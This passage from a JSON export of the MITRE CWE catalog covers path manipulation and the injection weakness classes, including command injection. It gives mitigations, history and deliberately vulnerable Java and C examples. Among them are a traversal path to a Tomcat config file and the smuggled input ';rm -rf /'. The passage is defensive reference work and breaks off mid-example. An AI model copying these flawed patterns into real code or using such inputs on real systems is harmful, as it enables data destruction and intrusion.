server."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59)."},{"Phase":["Installation","Operation"],"Description":"Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack."},{"Phase":["Operation","Implementation"],"Description":"If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-65"},"Intro_Text":"The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files (CWE-22).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-66"},"Intro_Text":"The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"fis = new FileInputStream(cfg.getProperty(\\"sub\\")+\\".txt\\");amt = fis.read(arr);out.println(arr);","xhtml:br":["",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5748","Description":"Chain: external control of values for user\'s desired language and theme enables path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748"},{"Reference":"CVE-2008-5764","Description":"Chain: external control of user\'s target language enables remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5764"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Path Manipulation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Notes":{"Note":[{"#text":"CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Relationship"},"xhtml:p":["The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc.","However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all.","The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Manipulation","attr":{"@_Date":"2008-04-11"}}}},"74":{"attr":{"@_ID":"74","@_Name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component (\'Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.","Extended_Description":"Software has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. Injection problems encompass a wide variety of issues -- all mitigated in very different ways and usually attempted in order to alter the control flow of the process. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Many injection attacks involve the disclosure of important information -- in terms of both data sensitivity and usefulness in further exploitation."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Other","Impact":"Alter Execution Logic","Note":"Injection attacks are characterized by the ability to significantly change the flow of a given process, and in some cases, to the execution of arbitrary code."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data injection attacks lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Injection problem (\'data\' used as something else)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"273"}},{"attr":{"@_CAPEC_ID":"28"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"84"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"Many people treat injection only as an input validation problem (CWE-20) because many people do not distinguish between the consequence/attack (injection) and the protection mechanism that prevents the attack from succeeding. However, input validation is only one potential protection mechanism (output encoding is another), and there is a chaining relationship between improper input validation and the improper enforcement of the structure of messages to other components. Other issues not directly related to input validation, such as race conditions, could similarly impact message structure.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationship_Notes, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":[{"#text":"Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into a Different Plane (aka \'Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into a Different Plane (\'Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"75":{"attr":{"@_ID":"75","@_Name":"Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not adequately filter user-controlled input for special elements with control implications.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter special element syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Special Element Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Special Element Injection","attr":{"@_Date":"2008-04-11"}}}},"76":{"attr":{"@_ID":"76","@_Name":"Improper Neutralization of Equivalent Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software properly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.","Extended_Description":"The software may have a fixed list of special characters it believes is complete. However, there may be alternate encodings, or representations that also have the same meaning. For example, the software may filter out a leading slash (/) to prevent absolute path names, but does not account for a tilde (~) followed by a user name, which on some *nix systems could be expanded to an absolute pathname. Alternately, the software might filter a dangerous \\"-e\\" command-line switch when calling an external program, but it might not account for \\"--exec\\" or other switches that have the same semantics.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"75","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Equivalent Special Element Injection"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Equivalent Special Element Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Equivalent Special Elements into a Different Plane","attr":{"@_Date":"2010-06-21"}}]}},"77":{"attr":{"@_ID":"77","@_Name":"Improper Neutralization of Special Elements used in a Command (\'Command Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["Command injection vulnerabilities typically occur when:","Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attacks.","Command injection is a common problem with wrapper programs."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1. Data enters the application from an untrusted source.","2. The data is part of a string that is executed as a command by the application.","3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If a malicious user injects a character (such as a semi-colon) that delimits the end of one command and the beginning of another, it may be possible to then insert an entirely new and unrelated command that was not intended to be executed."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If at all possible, use library calls rather than external processes to recreate the desired functionality."},{"Phase":"Implementation","Description":"If possible, ensure that all external commands called from the program are statically created."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Operation","Description":"Run time: Run time policy enforcement may be used in an allowlist fashion to prevent use of any non-sanctioned commands."},{"Phase":"System Configuration","Description":"Assign permissions to the software system that prevents the user from accessing/opening privileged files."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-30"},"Intro_Text":"The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char** argv) {}","xhtml:div":{"#text":"char cmd[CMD_MAX] = \\"/usr/bin/cat \\";strcat(cmd, argv[1]);system(cmd);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form \\";rm -rf /\\", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.","Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-28"},"Intro_Text":"The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String btype = request.getParameter(\\"backuptype\\");String cmd = new String(\\"cmd.exe /K \\\\\\"System.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""],"xhtml:div":{"#text":"c:\\\\\\\\util\\\\\\\\rmanDB.bat 